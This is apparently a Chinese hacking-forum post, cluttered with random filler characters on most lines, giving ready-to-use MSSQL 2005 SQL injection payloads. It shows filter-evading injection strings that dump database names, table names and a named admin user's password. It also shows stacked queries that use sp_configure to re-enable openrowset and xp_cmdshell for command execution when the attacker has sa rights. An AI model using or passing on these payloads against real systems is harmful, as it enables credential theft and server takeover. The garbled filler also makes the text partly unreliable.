; d5 t4 q2 _2 r
. R# A; Q# C+ X8 `( H0 e# C0 Y5 ~& ]& C; ^4 d
[Copy to clipboard]CODE:
$ e0 C+ U2 Q( k9 V s) E a/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--* ]7 B0 Z, X5 g! h2 }- G
6 u& N+ {" O3 u爆表语句,somedb部份是所要列的数据库,红色数字1累加
% V8 K8 [. P+ J3 z. k, B$ T/ b& O7 E0 D1 o( B
$ A+ [) u9 h' i2 |
[Copy to clipboard]CODE:! z( q+ L! ~' w
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--& \* u7 n! K- F* S* j; M6 C! B
) j+ U1 T5 M' |5 i. b6 |
爆字段语句,爆表admin里user='icerover'的密码段
% O { o6 c) i' F; l
. Q/ ^0 [4 I/ Q& w0 T/ C) ~
- b4 k) _& ]; c6 g: \[Copy to clipboard]CODE:1 s$ I. o2 }: M) V3 l4 W! V
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--' Z' l Y4 o- Z3 L2 M
, V: e8 e. ~. ^. L0 _mssql2005默认没有开xp_cmdshell的,openrowset也不能用
; c$ h& A7 s; g, Y- [( e- U如果是sa权限,可以这样来开启
$ t3 U* M+ Z, I" X3 V" K开启openrowset8 b1 s* S* [; E; D/ E5 Y( h
! Z' S3 e7 I1 {; w5 H
! t7 i" M1 [* ]- _. {0 R# R[Copy to clipboard]CODE:( E/ Q. }( {3 A' h+ f9 {6 b8 j6 v' }
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--2 ?$ ~, J1 a0 v/ m0 ? m
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 ~0 O# @% @9 C# n! a0 O0 W# ]( a& ^$ h- o; I G y" i
开启xp_cmdshell1 X+ N/ P7 j6 X& D
' ]+ V! l7 \7 U9 c9 A9 z' b7 T
# h- |& c, ]5 D- o[Copy to clipboard]CODE:
- z. [) X7 r7 |9 |% Q5 LEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--0 C4 ^7 @& H; r1 h
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
7 H6 N! P N8 f& s5 y4 h3 _
" N: u9 }9 _$ z6 P+ @, |8 eok,over~~晚安
- k6 t" t8 H+ l- B6 k |